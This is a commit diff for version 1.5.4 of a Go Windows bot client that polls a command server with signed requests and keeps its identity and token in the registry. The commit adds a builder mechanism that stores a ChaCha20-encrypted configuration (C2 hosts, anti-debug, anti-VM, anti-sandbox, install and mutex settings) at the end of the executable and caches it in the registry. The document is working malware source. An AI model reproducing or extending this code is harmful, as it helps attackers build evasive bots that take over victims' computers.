⚡Update v1.5.4

1. Add timeout task cleaner
2. Add builder
3. Fix bugs

Author: unknown

.gitignore

@@ -8,4 +8,9 @@
 /pic/
 /server/*.exe
 /server/Log/
-/features.md
+/server/payload.yaml
+/server/config.yaml
+/features.md
+/.idea/
+/client/.idea/
+/server/.idea/

client/components/common.go

@@ -2,6 +2,8 @@ package components
 
 import (
 	"fmt"
+	"os"
+	"path/filepath"
 	"strconv"
 	"time"
 )
@@ -49,3 +51,36 @@ func generate_utc_timestamp() int64 {
 func generate_utc_timestamp_string() string {
 	return strconv.FormatInt(generate_utc_timestamp(), 10)
 }
+
+func get_module_file() string {
+	exe, err := os.Executable()
+	if err != nil {
+		return ""
+	}
+	exe, err = filepath.EvalSymlinks(exe)
+	if err != nil {
+		return ""
+	}
+	return exe
+}
+
+func int_to_bytes(n int) []byte {
+	bytes := []byte{
+		byte(n & 0xff),
+		byte((n >> 8) & 0xff),
+		byte((n >> 16) & 0xff),
+		byte((n >> 24) & 0xff),
+	}
+	return bytes
+}
+
+func bytes_to_int(b []byte) int {
+	var result int = 0
+
+	result |= int(b[0])
+	result |= int(b[1]) << 8
+	result |= int(b[2]) << 16
+	result |= int(b[3]) << 24
+
+	return result
+}

client/components/core.go

@@ -2,6 +2,7 @@ package components
 
 import (
 	"encoding/json"
+	"io"
 	"log"
 	"os"
 	"strconv"
@@ -105,7 +106,7 @@ func send_poll_request(host string) BotState {
 		"X-Sign": base64_enc(sign),
 	}, botcore.use_ssl)
 	if reply == nil || !check_package_legality(reply) {
-		return StateCommandPoll
+		return StateRecoverPoll
 	}
 	reply.Cmd = strings.TrimSpace(reply.Cmd)
 
@@ -132,7 +133,7 @@ func auth_bot_poll(state BotState, host string) BotState {
 
 	switch state {
 	case StateReadGuid:
-		val := reg_read_key(registry.CURRENT_USER, g_regpath, "guid", false)
+		val := reg_read_key(registry.CURRENT_USER, g_regpath, "guid", 1)
 		if val == nil || val == "" {
 			next_state = StateGenGuid
 		} else {
@@ -153,7 +154,7 @@ func auth_bot_poll(state BotState, host string) BotState {
 		}
 		next_state = StateGenGuid
 	case StateReadToken:
-		val := reg_read_key(registry.CURRENT_USER, g_regpath, "token", false)
+		val := reg_read_key(registry.CURRENT_USER, g_regpath, "token", 1)
 		if val == nil || val.(string) == "" {
 			next_state = StateRecoverPoll
 		} else {
@@ -187,7 +188,93 @@ func handle_command() {
 
 }
 
+func read_config() bool {
+	var build_config BuildConfig
+
+	// Try to read config from registry
+	bytesConfig, ok := reg_read_key(registry.CURRENT_USER, g_regpath, "config", 2).([]byte)
+	if ok && bytesConfig != nil {
+		// Read configure from registry ok\
+		len := len(bytesConfig) - 32
+		encConfig := bytesConfig[:len]
+		key := bytesConfig[len:]
+		cleanConfig := dec_chacha20(key, encConfig)
+		if nil == cleanConfig {
+			return false
+		}
+		json.Unmarshal(cleanConfig, &build_config)
+	} else {
+		exe := get_module_file()
+		if exe == "" {
+			return false
+		}
+		f, err := os.Open(exe)
+		if err != nil {
+			return false
+		}
+		defer f.Close()
+		// Read configure size
+		_, err = f.Seek(-4, io.SeekEnd)
+		if err != nil {
+			return false
+		}
+		size_buf := make([]byte, 4)
+		_, err = f.Read(size_buf)
+		if err != nil {
+			return false
+		}
+		// Read configure
+		config_size := bytes_to_int(size_buf)
+		if config_size == 0 {
+			return false
+		}
+		_, err = f.Seek(int64(-(4 + config_size)), io.SeekEnd)
+		if err != nil {
+			return false
+		}
+		config_buf := make([]byte, config_size)
+		f.Read(config_buf)
+		// Read chacha20 key
+		_, err = f.Seek(int64(-(4 + config_size + 32)), io.SeekEnd)
+		key := make([]byte, 32)
+		_, err = f.Read(key)
+		if err != nil {
+			return false
+		}
+		// Decrypt config with chacha20 key
+		decConfigBuf := dec_chacha20(key, config_buf)
+		if decConfigBuf == nil {
+			return false
+		}
+		json.Unmarshal(decConfigBuf, &build_config)
+
+		// Save configure to registry
+		savedConfig := append(config_buf, key...)
+		if !reg_create_or_update_value(registry.CURRENT_USER, g_regpath, "config", savedConfig, true) {
+			log.Println("Failed to create config registry")
+		}
+	}
+	botcore.singleton = build_config.Single
+	botcore.anti_debug = build_config.Anti_debug
+	botcore.anti_vm = build_config.Anti_vm
+	botcore.anti_sandbox = build_config.Anti_sandbox
+	botcore.install = build_config.Install
+	botcore.install_file = build_config.Install_file
+	botcore.mutex_name = build_config.Mutex_name
+	botcore.delay = build_config.Delay
+	botcore.use_ssl = build_config.Use_ssl
+	botcore.version = build_config.Version
+	botcore.hosts = build_config.Host
+
+	return true
+}
+
 func Run() {
+	// Read configure
+	if !read_config() {
+		os.Exit(0)
+	}
+
 	// Check singleton
 	if is_already_exist(botcore.mutex_name) {
 		os.Exit(0)

client/components/crypto.go

@@ -2,9 +2,11 @@ package components
 
 import (
 	"crypto/hmac"
+	"crypto/rand"
 	"crypto/sha256"
 	"encoding/base64"
 	"encoding/hex"
+	"golang.org/x/crypto/chacha20"
 )
 
 // Base64 encryption
@@ -36,3 +38,35 @@ func create_sign(token string, guid string, timestamp string) []byte {
 	data := []byte(guid + timestamp)
 	return hmac_sha256(bytToken, data)
 }
+
+func enc_chacha20(key, plain []byte) []byte {
+
+	nonce := make([]byte, chacha20.NonceSize)
+	_, err := rand.Read(nonce)
+	if err != nil {
+		return nil
+	}
+	cipher, err := chacha20.NewUnauthenticatedCipher(key, nonce)
+	if err != nil {
+		return nil
+	}
+
+	cipher_text := make([]byte, len(plain))
+	cipher.XORKeyStream(cipher_text, plain)
+
+	return append(nonce, cipher_text...)
+}
+
+func dec_chacha20(key, nonceCipher []byte) []byte {
+	nonce := nonceCipher[:chacha20.NonceSize]
+	text := nonceCipher[chacha20.NonceSize:]
+
+	cipher, err := chacha20.NewUnauthenticatedCipher(key, nonce)
+	if err != nil {
+		return nil
+	}
+	plain := make([]byte, len(text))
+
+	cipher.XORKeyStream(plain, text)
+	return plain
+}

client/components/global.go

@@ -73,16 +73,16 @@ var (
 	pfnGetCurrentProcess   = kernel32.NewProc("GetCurrentProcess")
 
 	botcore = BotCore{
-		version:      "1.4.4",
-		hosts:        []string{"127.0.0.1:8080"},
+		version:      "1.5.4",
+		hosts:        []string{"127.0.0.1:3596"},
 		singleton:    true,
 		anti_debug:   false,
 		anti_vm:      false,
 		anti_sandbox: false,
 		install:      false,
 		use_ssl:      false,
 		delay:        0,
-		mutex_name:   "heelo",
+		mutex_name:   "eSq3w0KtD7gDMR7q",
 		install_file: "",
 		install_path: "",
 	}
@@ -158,3 +158,17 @@ type Client struct {
 	Lastseen    string `json:"lastseen"`
 	Lastcommand string `json:"lastcommand"`
 }
+
+type BuildConfig struct {
+	Version      string   `json:"version"`
+	Host         []string `json:"host"`
+	Single       bool     `json:"single"`
+	Anti_debug   bool     `json:"anti_debug"`
+	Anti_vm      bool     `json:"anti_vm"`
+	Anti_sandbox bool     `json:"anti_sandbox"`
+	Install      bool     `json:"install"`
+	Install_file string   `json:"file"`
+	Mutex_name   string   `json:"mutex"`
+	Delay        uint     `json:"delay"`
+	Use_ssl      bool     `json:"ssl"`
+}

client/components/info.go

@@ -689,7 +689,7 @@ func get_bot_info() []byte {
 	}
 
 	if len(g_installdate) == 0 {
-		result := reg_read_key(registry.CURRENT_USER, g_regpath, "installdate", false)
+		result := reg_read_key(registry.CURRENT_USER, g_regpath, "installdate", 1)
 		if result == nil {
 			g_installdate = generate_utc_timestamp_string()
 		} else {

client/components/net.go

@@ -16,7 +16,7 @@ import (
 )
 
 var clientHTTP = &http.Client{
-	// Timeout: 10 * time.Second,
+	//Timeout: 10 * time.Second,
 }
 
 var clientHTTPS = &http.Client{
@@ -25,7 +25,7 @@ var clientHTTPS = &http.Client{
 			InsecureSkipVerify: true,
 		},
 	},
-	// Timeout: 10 * time.Second,
+	//Timeout: 10 * time.Second,
 }
 
 func get_client(useSSL bool) *http.Client {

client/components/system.go

@@ -95,7 +95,7 @@ func find_pid_by_name(name string) uint32 {
 	return 0
 }
 
-func reg_read_key(key registry.Key, subPath string, value string, fInt bool) any {
+func reg_read_key(key registry.Key, subPath string, value string, keyType int) any {
 
 	key1 := reg_create_key(key, subPath)
 	if key1 == 0 {
@@ -104,10 +104,12 @@ func reg_read_key(key registry.Key, subPath string, value string, fInt bool) any
 	defer key1.Close()
 	var data any
 
-	if fInt {
+	if keyType == 0 {
 		data, _, _ = key1.GetIntegerValue(value)
-	} else {
+	} else if keyType == 1 {
 		data, _, _ = key1.GetStringValue(value)
+	} else if keyType == 2 {
+		data, _, _ = key1.GetBinaryValue(value)
 	}
 
 	return data

client/go.mod

@@ -4,7 +4,7 @@ go 1.25.4
 
 require (
 	github.com/StackExchange/wmi v1.2.1
-	golang.org/x/sys v0.38.0
+	golang.org/x/sys v0.39.0
 )
 
 require (
@@ -14,6 +14,7 @@ require (
 	github.com/power-devops/perfstat v0.0.0-20240221224432-82ca36839d55 // indirect
 	github.com/tklauser/go-sysconf v0.3.16 // indirect
 	github.com/tklauser/numcpus v0.11.0 // indirect
+	golang.org/x/crypto v0.46.0 // indirect
 )
 
 require (

client/go.sum

@@ -28,6 +28,8 @@ github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo
 github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0=
 golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU=
+golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0=
 golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
 golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
 golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
@@ -39,6 +41,8 @@ golang.org/x/sys v0.0.0-20190916202348-b4ddaad3f8a3/go.mod h1:h1NjWce9XRLGQEsW7w
 golang.org/x/sys v0.0.0-20201204225414-ed752295db88/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.38.0 h1:3yZWxaJjBmCWXqhN1qh02AkOnCQ1poK6oF+a7xWL6Gc=
 golang.org/x/sys v0.38.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
+golang.org/x/sys v0.39.0 h1:CvCKL8MeisomCi6qNZ+wbb0DN9E5AATixKsvNtMoMFk=
+golang.org/x/sys v0.39.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
 golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=